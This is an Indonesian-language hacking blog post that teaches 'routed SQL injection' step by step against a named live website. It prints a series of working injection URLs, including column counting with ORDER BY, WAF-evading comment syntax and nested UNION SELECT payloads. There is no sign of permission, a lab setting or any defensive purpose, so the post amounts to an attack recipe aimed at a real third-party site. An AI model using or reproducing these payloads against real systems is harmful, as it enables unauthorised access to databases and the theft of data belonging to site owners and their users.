Tuesday, June 23, 2020

Routed SQL-injection

Yow Whatsapp crew,
Wellcome back with me.
Kali ini gua bakal ngebahas Routed SQL-injection.

Bahan bahan :
- Kouta :v

Site :
http://www.jeffreycarbo.com/page.php?name=3

How to Inject
 http://www.jeffreycarbo.com/page.php?name=3 muncul error tapi jangan pedulikan hal tersebut karena itu adalah halaman normalnya

Ketika saya order by 2 muncul error http://www.jeffreycarbo.com/page.php?name=3'+order+by+2--+- tapi di order by 1 error tersebut hilang

Jadi saya union select menggunakan column 1 tersebut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1--+- tapi tidak terjadi apa apa karena website tersebut vuln terhadap Routed sqli, cara mengetahuinya adalah

http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+1'--+-  ubah 1' menjadi hex jika normal berarti vuln terhadap Routed sqli

Lanjut ke exploit tambahkan seperti berikut
http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'"--+- dan anggap saja angka 1 tersebut menjadi parameter, tapi jangan sampai hilangkan " "

Lalu kalian order by lagi di parameter "1'" Seperti berikut http://www.jeffreycarbo.com/page.php?name=3'+and+0+/*!50000union*/+/*!50000select*/+"1'+order+by+7--+-"--+- kalian cari sampai error lalu kalian union select sepertu biasa :D

Dan hasilnya :
http://www.jeffreycarbo.com/page.php?name=3%27+and+0+/*!50000union*/+/*!50000select*/+%221+and+0+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+-%22--+-

Sekian materi kali ini,
Previous Post
Next Post

Hai Sahabat, Nama Saya Nararya dari Bali Salam Kenal Yhaa :D

0 Comments: